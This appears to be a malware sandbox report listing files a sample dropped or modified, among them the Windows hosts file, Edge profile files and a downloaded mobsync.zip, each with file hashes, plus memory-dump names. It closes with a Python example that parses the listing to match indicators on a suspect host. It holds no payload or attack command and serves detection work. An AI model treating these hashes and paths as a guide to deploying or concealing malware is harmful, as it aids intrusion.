| MD5 | 03f15dff10ac451682f8a308674ddf77 |
| SHA1 | c723e23c49bed8a52b8f947b2cb8879a110fc94b |
| SHA256 | f967e18d5b1839ba801212f032e7e6dd92f7ba6958bc3ae9b122d9fadf2b1bf4 |
| SHA512 | df8fdc89cc1e6f2edce49b41bd9f71dc7f7a8daab40f1355415119f9c0a0d5067337d966472ad49f855ecb9a89bee8d1711d8a869589a03e469530ee8d7e0f3e |
memory/3952-2490-0x0000000000400000-0x0000000000419000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aut71B7.tmp
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
memory/5356-2517-0x0000000000460000-0x000000000054C000-memory.dmp
memory/5356-2523-0x0000000000460000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a3
| MD5 | 1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5 |
| SHA1 | 6dd8803e59949c985d6a9df2f26c833041a5178c |
| SHA256 | af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725 |
| SHA512 | b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a1
| MD5 | cc63ec5f8962041727f3a20d6a278329 |
| SHA1 | 6cbeee84f8f648f6c2484e8934b189ba76eaeb81 |
| SHA256 | 89a4d1b2e007ac49fc9677d797266268cd031f99aa0766ca2450bff84ac227d1 |
| SHA512 | 107cf3499a6cf9cdcbfa3ef4c6b4f2cda2472be116f8efa51ff403c624e8001d254be52de7834b2a6ab9f4bcc1a3b19adc0bba8c496e505abbca371ef6c8f877 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a2
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a4
| MD5 | 226541550a51911c375216f718493f65 |
| SHA1 | f6e608468401f9384cabdef45ca19e2afacc84bd |
| SHA256 | caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5 |
| SHA512 | 2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 7b40b3433d5b06e030f182abb4681bd7 |
| SHA1 | 941f97620a812f0d16f3b9be83eb0281d206d2be |
| SHA256 | 62c41bf883b3bc84be852296486d01997791bb003787e4c37b53dab4fe10f717 |
| SHA512 | 49a46578b17f950de6f4ac25d38b49464cad3287ef9587d7688a600e4aacaafca0141484bfee17e7e85a4f3c762230280ecb9ab88228b9ddcf3c834b2a2b0135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 3af0951ff4aa8c5be8b53b45df7bd36b |
| SHA1 | 171ea125df08e75c784b23edd391e67cb2ba51f8 |
| SHA256 | 9c21000f3d5fe01d89a0f2e5b0d8fba024c4c089c0a9e3a5a459515d24720f32 |
| SHA512 | ce0d92cbac522e1f372a5f0db1c8b00b811b8905f79c77243f0390ce2128fafa950281a4ede58c35ec786c54c20da57f2438e144e8071cefc5170fc3c0d61cfb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000e1
| MD5 | 1ae95ff56e5aa3d1898b296491a7c1df |
| SHA1 | 64302a34669ff16aee432e8ed540c4b1f6f96b6b |
| SHA256 | 6c12ed0a16764710f11f5af99ca9666a4a14543e1f7adfcfa4bc1e64243ba306 |
| SHA512 | c804549b15ae18977047fb4a2243a5c97445b0e380650e4a07abed4fee4439cdc96728566c1c15c76ba4e204e15a3fdb6d2fac7561517d3c4f83916a91f7eaf5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000df
| MD5 | 9d6bf5f76b7464f9972349062dfdfbed |
| SHA1 | 6c90390ed5d278926c5fbbc8c9897dda7ed96688 |
| SHA256 | cde1bc7b5f256bc86b0457f3167cf118019fdf767af82cfdfd3ef7a7b6fb59f8 |
| SHA512 | 88c33e2814b63b748dd0f43eb4e90d100211eff4be143f6fbb3caa3192de66d0d8410be3dbf4529830fa33b3de8161dff3c301f1e37877543c155ed4542b48a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 1acd0c6a0ef06776d8cf0e977412b218 |
| SHA1 | 56526be9e5bae97ed2dc0be976e4df17d7c141f7 |
| SHA256 | 37b7c0181c9a17c7959b95172a64dea9fd59b8ea9b2bf5ae2d24b0619a896a5f |
| SHA512 | 4d4a2a3237dcac865b18f84206e9306002b02dd1379f6002f177b6a26516d9d66f6f561b0046e76badf8d973f3e80c23fa4631411b169d06d25c316ddc45376e |
C:\Windows\System32\drivers\etc\hosts
| MD5 | abf47d44b6b5cd8701fdbd22e6bed243 |
| SHA1 | 777c06411348954e6902d0c894bdac93d59208da |
| SHA256 | 4bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754 |
| SHA512 | 9dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77 |
C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json
| MD5 | 4055ba4ebd5546fb6306d6a3151a236a |
| SHA1 | 609a989f14f8ee9ed9bffbd6ddba3214fd0d0109 |
| SHA256 | cb929ae2d466e597ecc4f588ba22faf68f7cfc204b3986819c85ac608d6f82b5 |
| SHA512 | 58d39f7ae0dafd067c6dba34c686506c1718112ad5af8a255eb9a7d6ec0edca318b557565f5914c5140eb9d1b6e2ffbb08c9d596f43e7a79fdb4ef95457bf29a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 6086742a691db566b3d402142b81fb41 |
| SHA1 | 4e4fae5bd63eb6a616d72ace7b1ffb5d71d81d3c |
| SHA256 | c2db2a7300eb89bd40c7e48089a1b2585d9344a5b932c5897aaa9ab4783be235 |
| SHA512 | d14bcd68a934788a9fd530c85cd66292b7d6e1c2027183e8dc035139cdbeae5690ff5c02a71a5c8bb480c9b75b006bfc337f1fe7d27b994bd1f1a00ecef8f4c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000ef
| MD5 | d02d85e2940ecbe8067a3dcaf5234e16 |
| SHA1 | f495850a50a7bbec5590d00674abd3303462cab7 |
| SHA256 | 747b3528c8d1b721b86087a8314a97b44f418d831f1562483699b0daf4a72e76 |
| SHA512 | 3e4609ab6eac3795c5ae188667ce458fb04ba357ea1ecf741cb7ce12e942b0c82316a0f5705352a19bcafc2b81d9537fb89acd093e96521c820aca88f2e75241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000e4
| MD5 | bd35a83bccf2b1a87ea1ac37d1f97fc4 |
| SHA1 | 428463e987aedfc1f96eb38f072eb2870c65ba47 |
| SHA256 | cc80d4097d03ad2068c3e70d8451e457cb8813abbe1e40a51346cfb75427b892 |
| SHA512 | 2b37c7c44a784de946bf87ab53f3d7eb8e9b82c19f439f7ed13865f0b525a2ac94212747668aaf0393922c5dc588c52fc9b2bc319fdfa645d09e8739a7182f63 |
memory/6124-3529-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1472-3532-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5284-3535-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Users\Admin\Downloads\mobsync.zip
| MD5 | 91ae1cf52d45ea7789d69b22e25a5dfd |
| SHA1 | 633e304b8038696a12116198a5f7585304705ba4 |
| SHA256 | 5ede962a9282e255f9efe5a554c89e8f60cf6c11c045d9662a46e34067735998 |
| SHA512 | a0e4b25188e5e180988f8573f09d390ccdf0d332bc1ad8afa83e18b5aee178936d09fd862413b62d19653f7ce61f70e597e95e09beb03b2ddaa70dac9a34fe18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7af15b9000f4b4507e25a5c920358949 |
| SHA1 | b0cbff7d068dc4166d833e2b75aa9903f992c294 |
| SHA256 | 6429a035c6cfdd6c7aeb5a902e38fbd670904ec3b574d8fa90def4796b8a8919 |
| SHA512 | 304757ad782118ed3e702b7fb9e8f3815149db13bfe04d2afec8ced6a3c9151111bd7d67c6bf45c785328f93334631bb09ae72f062e677abd50b324d1103a98a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 366ae853094ed661d7279ffe9f1758c1 |
| SHA1 | 33b223a07b05611f1e95a13cd683d3d1197e4ed9 |
| SHA256 | f3da3026043e6e5889db4cfb6f52460c60c8c215080880f9778288de0e51cd7b |
| SHA512 | 16bf946c7965696eb754ce23dbcf0d0180147f1aef43605bac8fff5fa6fc72c558fa92817770be7199b5823b7af095bd6941ac674f3113a5a8bf8b27b439bb4e |
C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json
| MD5 | 778202dc964e7fb0ab5bed004f33fb14 |
| SHA1 | 932ed013275e2c1172575885246c937c7cca87af |
| SHA256 | 4474f08d1718da148ddb55aeb998886c053f6539c2fee3b3b1796f3855792ff9 |
| SHA512 | 9105af9928af4bcceb2cdc2161137ef6b07f4b97d663bbf27086f80dd266e967a5524aa5aec3f457493a0c4b98aa092aac6bd5062e72cbd4d939402c92093948 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8649866f3ef1f42851d3be6e101cf291 |
| SHA1 | bc0975622ae18aee84b00e56998e3495695abeff |
| SHA256 | 146a874a2ee880c64349549be62f0e096800911254bf00cd4db45fbbd80029b9 |
| SHA512 | b0f710618556a8e34eb10c2237380955f592d4976fa6dad1129f93ae50d54de15b3e4d30655c3efef9d3f90d4646a0d6653cccb23f5d4ced13f793e00e530590 |
memory/5060-3656-0x0000000001000000-0x0000000001026000-memory.dmp
memory/5060-3660-0x0000000001000000-0x0000000001026000-memory.dmp
memory/5324-3671-0x0000000001000000-0x0000000001026000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7d7066318ee1e0b8d4709626b89d443a |
| SHA1 | 43dfecc1f1c6cdf4fb02b496d42930b8c13957db |
| SHA256 | fbd2d22c5313e9704dbd12c3248a57b46854b10b3e42ce369e133d87ce246c44 |
| SHA512 | 906bd38a79f22ff68702d7ed34b08daa35033760385447f43184917c9b81956cd0c12c5c6a5907e8ed947924c6d58b31810464a37b06902ea8b3346c30c227fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | ea63ecb25f310d6d583ace96e206905c |
| SHA1 | 2c7c5e76737f6ec7b0ea7a8c8de7df1061263a02 |
| SHA256 | 3346fdfdd267da2dd40918724d4b17c64b8d6280801dfecb6c81d65fdef8397c |
| SHA512 | 086d3e90a188726353eee21201b77dc8bad99bed8fe1045887e8b4f4b87192527adfa9db5f172ac63498fa2061fbb5797c995470e80440957da548af749cd084 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001
| MD5 | 2122468364ed197a55bcfae83d8cc540 |
| SHA1 | 61661bc860e0da422bf4c2bd5d059ef9224ed88b |
| SHA256 | 5cf9cc0abff33ba3a12ba7c88deefd01c20018f0f816bc4dd19a28dc93f2af42 |
| SHA512 | 7f3453076e487c94d86b9eb26eceacf0c40eef4e7b76ae694cb05afe5378014896880f37d467a7d7a63d7c138315ca5aad41df215cd5c7a8b962cb121c5b5d18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a5
| MD5 | 30ad8fc8f7db34fb0a0299b704c3432e |
| SHA1 | 722dadc2649f004961a9a3f4a62f9a8cea8e8eb6 |
| SHA256 | a5ebe3cc97796a3c1319838f3a31ddcb45e721e3a9b5e65506251d0b7e95f568 |
| SHA512 | d80ed073326a61408799ef98f631d7988ce64c4c83deb287354fd464a244b9ee1f18214e87216cbf945f2324a897c5c5ee751a65827ef65577c3eb7597fb94fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a6
| MD5 | e04988fd79ca6506eea81a6be8ebba89 |
| SHA1 | ba271fd9d8c8b821c4e0acb0ff548423459f8cc1 |
| SHA256 | 455f194fd9120b90a138a6b16587b4b96f45110fb3b8e3bdb303e82363e1bc43 |
| SHA512 | e0b1c0f4fc4adec867c76a77e697a94ab3fb2696960a0bbeb8ee7f22b0fcf7a7f10f7e92eb8ba78eeacaa0683f26214132b3fc781fca84b4d5c5df4f62cc4f63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2fa4a2f2d952a81bd96ea39195278892 |
| SHA1 | d4264e7ebdda53dac08cc28e5d89568af5ac552e |
| SHA256 | 4897d73da03b508cb64adc1a6bfb66d4c10504967f00f783039dd35714c8dd6a |
| SHA512 | fe2c92032cf2e15427fc6d34a10c8fc306d7a91d8f9800c4a224c613ea8b8fd1bd8224713d6c22e54e1852f3d7337b031ee21feb659ccbf010cf24328ce89603 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | aab1906aec0ac45b56f690d6f36f1953 |
| SHA1 | 66fbf746648bc7618957e89510208cc91ba4be4c |
| SHA256 | 0ee38432112c4f1ca7ed589f1ce65aa30aab6a905e0894fd069c1aca14df492f |
| SHA512 | 7a53ecfcec48a7b4bf94d5f0d38ed4fd0fcf0782467d1741ed4e47e514adfd6322e464e3311aa22c49cf67a3714f44526fed145ba6206a6dadebdc32903f0b37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | c8988d4543db30924b1797ddf7354d14 |
| SHA1 | f201f4e636c6f864ad6c81aec35f12f74e5fea6f |
| SHA256 | 421ccce34a010faca4c0e3aed087248245d993b29bbd95374d9ace4993e136cb |
| SHA512 | 0a585aa73f14e2bb37ce2f21b1d4d3fdb11f0387be6d9f2ca4828a75163442ecc9c65fa2e4ef18ecb6a54f95c244c1726f95c6a468b3c1519fcb775492e74b39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 855f7abcffd8848f3ddaa3032073b361 |
| SHA1 | 06f2122e813f346dd1023f3844984262e4048699 |
| SHA256 | 1a31571518c6b1ea91c155239ac7798cc30373f21c5d9f36bf23800d62efa8f3 |
| SHA512 | 41fa37b11584711defd3951f49ddf3761d151ef05838944efe754f5140584a070a9ea731a0e133ead36e5a59bcf0753aac40744cdb2f994a2e39803b6aca2aaf |
C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json
| MD5 | e6cd92ad3b3ab9cb3d325f3c4b7559aa |
| SHA1 | 0704d57b52cf55674524a5278ed4f7ba1e19ca0c |
| SHA256 | 63dfb8d99ce83b3ca282eb697dc76b17b4a48e4065fc7efafb77724739074a9d |
| SHA512 | 172d5dc107757bb591b9a8ed7f2b48f22b5184d6537572d375801113e294febfbe39077c408e3a04c44e6072427cbe443c6614d205a5a4aa290101722e18f5e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2024.12.2\crl-set
| MD5 | 846feb52bd6829102a780ec0da74ab04 |
| SHA1 | dd98409b49f0cd1f9d0028962d7276860579fb54 |
| SHA256 | 124b7eeba31f0e3d9b842a62f3441204beb13fade81da38b854aecba0e03a5b4 |
| SHA512 | c8759e675506ccc6aa9807798252c7e7c48a0ab31674609738617dc105cee38bce69d4d41d6b95e16731466880b386d35483cbeea6275773f7041ba6e305fae9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2acd390ef7596d45b7864455166afc6b |
| SHA1 | c684f91b60386387786323b4ef5839b29f1346bb |
| SHA256 | b5584f7fef501df921b56ba06747cb72fb32cead2dbae829c0525430deb3a33f |
| SHA512 | 0ac08b6287efc77b0a698d573902368d80424c95ea00b3d8607607bf1038763573150ae0c0e1314aff0e8aca21d8c9b2b9f1a8909d44501c96fe38b0527a04b5 |
memory/5452-3924-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | b69247caf64914466b8f2988d4678b4f |
| SHA1 | 269fb084ad4f9a55296c9ea731d279d3c32748e5 |
| SHA256 | ae89c8728442f3b4ee4066378105271dbab35980b873762f51902c77d08cd10d |
| SHA512 | 4ceb746eca8ecdf4e9883dcd3810a4f5bb27d4eda1d9a87cbec3d8a33f78f5b4d8c2eb49debe0c8c5a04b638cfc8ced8ac2d488d98e39e8015e4ce846969faa0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b2c78e26cf8c84dc3583a3258a3c5b54 |
| SHA1 | c5e5138a43bda7d29e9f940c57712aa3515ddc83 |
| SHA256 | 530215a5f0c7e6f12b0315c7ae5323ff683b1279febe9bf1d7df04e829e88af5 |
| SHA512 | fec1c2582cdd703ed032a435dbbad0f7a0794be739b8c8ef85e2caab35a64960472f77b5114a64d772c1f85673bb0118b8c9e82dfc050a2d60cbe1f54d762f80 |
memory/5300-3969-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.json
| MD5 | ec2d07974ef45152a83c82d09a08e138 |
| SHA1 | cdfca8778648c74844b359b2d0f1d405302de8f6 |
| SHA256 | bd6ad3cd015f36a4958892945f666703aeb10b2999422f58b699ba2d0895fa87 |
| SHA512 | a9ec4562f90d2400229c6b30259ba569181398e20ede3dee4e8199a3c46f7607de5f78ab2ca115d83e7296f4e373625790ebe00108f1d0568b8f6f42cbc26dde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.5.9.1\typosquatting_list.pb
| MD5 | a50b46aa311787328482750c251d2633 |
| SHA1 | eaa327f9a89e5ec13301979f4ce49a36fc871049 |
| SHA256 | 019b9efc88e3e5939912472d7a9e43a8d9b675fff7ebf9b7b445042f6de4b721 |
| SHA512 | a6820b29aa645abebeca3683ceb91372d69d8e589859e03f653ad6b2f3470ce2248603ce265c5d11f3da4833776d22493f3371e8e297591b678fa364bb5dc149 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c4cbaf551267b48b2bbecf73dbb170fa |
| SHA1 | 9e294ab4b33e5c7c8e0047e6a726d7bca6685fef |
| SHA256 | 217c0349229460479b90297f4ba8d3363c87a03a2387b95f847829d79318babd |
| SHA512 | 5855b35404fdd4421b604227b8b6321900ae6c82f5b066988c171c52c4ebb0a7cc4400e55570f56682f65230154793e1a4fb04231885ebf0cad3a511273cdb9c |
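The dropped-files listing above is raw sandbox output in a `path` line followed by `| MD5 | ... |` style hash rows, with `memory/...` dump entries carrying no hashes. As an added example (not part of the original report and not the sandbox's own tooling), the Python below parses entries in that format into records, builds a digest index so files collected from a suspect host can be matched against the listing by any of the four algorithms, and flags paths that occur more than once with differing hashes, which is how you distinguish a file the sample rewrote repeatedly during the run (the Edge `Local State` file is recorded several times above) from a one-off drop. The embedded listing is a handful of entries copied from this page; the function names and the `abc` check vector are this example's own.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: a few entries copied verbatim from the dropped-files listing.
SAMPLE_LISTING = r"""
C:\Windows\System32\drivers\etc\hosts
| MD5 | abf47d44b6b5cd8701fdbd22e6bed243 |
| SHA1 | 777c06411348954e6902d0c894bdac93d59208da |
| SHA256 | 4bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754 |
| SHA512 | 9dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77 |
C:\Users\Admin\Downloads\mobsync.zip
| MD5 | 91ae1cf52d45ea7789d69b22e25a5dfd |
| SHA1 | 633e304b8038696a12116198a5f7585304705ba4 |
| SHA256 | 5ede962a9282e255f9efe5a554c89e8f60cf6c11c045d9662a46e34067735998 |
| SHA512 | a0e4b25188e5e180988f8573f09d390ccdf0d332bc1ad8afa83e18b5aee178936d09fd862413b62d19653f7ce61f70e597e95e09beb03b2ddaa70dac9a34fe18 |
memory/5452-3924-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7af15b9000f4b4507e25a5c920358949 |
| SHA1 | b0cbff7d068dc4166d833e2b75aa9903f992c294 |
| SHA256 | 6429a035c6cfdd6c7aeb5a902e38fbd670904ec3b574d8fa90def4796b8a8919 |
| SHA512 | 304757ad782118ed3e702b7fb9e8f3815149db13bfe04d2afec8ced6a3c9151111bd7d67c6bf45c785328f93334631bb09ae72f062e677abd50b324d1103a98a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7d7066318ee1e0b8d4709626b89d443a |
| SHA1 | 43dfecc1f1c6cdf4fb02b496d42930b8c13957db |
| SHA256 | fbd2d22c5313e9704dbd12c3248a57b46854b10b3e42ce369e133d87ce246c44 |
| SHA512 | 906bd38a79f22ff68702d7ed34b08daa35033760385447f43184917c9b81956cd0c12c5c6a5907e8ed947924c6d58b31810464a37b06902ea8b3346c30c227fb |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_listing(text):
    """Return a list of (path, {algo: hexdigest}) records.

    A non-hash line starts a new record (a file path or a memory dump name);
    hash rows attach to the record started most recently. Digest lengths are
    checked so a truncated or mangled row fails loudly instead of silently
    producing an IOC that can never match.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row before any path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current[0]}")
            current[1][algo] = digest
        else:
            current = (line, {})
            records.append(current)
    return records


def build_index(records):
    """Map every recorded digest, regardless of algorithm, to the paths it was seen at."""
    index = defaultdict(set)
    for path, hashes in records:
        for digest in hashes.values():
            index[digest].add(path)
    return index


def digests_of(data):
    """Compute the same four digests the listing records, for one file's bytes."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def match_bytes(index, data):
    """Return the listing paths whose recorded hashes match these bytes under any algorithm."""
    hits = set()
    for digest in digests_of(data).values():
        hits |= index.get(digest, set())
    return hits


def rewritten_paths(records):
    """Paths recorded more than once with different SHA256 values: files the sample
    rewrote during the run rather than dropped once."""
    seen = defaultdict(set)
    for path, hashes in records:
        if "SHA256" in hashes:
            seen[path].add(hashes["SHA256"])
    return {path for path, digests in seen.items() if len(digests) > 1}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    print(f"{len(recs)} entries, {sum(1 for _, h in recs if h)} with hashes")
    for path in sorted(rewritten_paths(recs)):
        print("rewritten during run:", path)
```

To use this against a collected triage image, read each file's bytes and call `match_bytes` with the index built from the full listing; a hit on `C:\Windows\System32\drivers\etc\hosts` in particular is worth pulling the file for, since the listing shows the sample touched it.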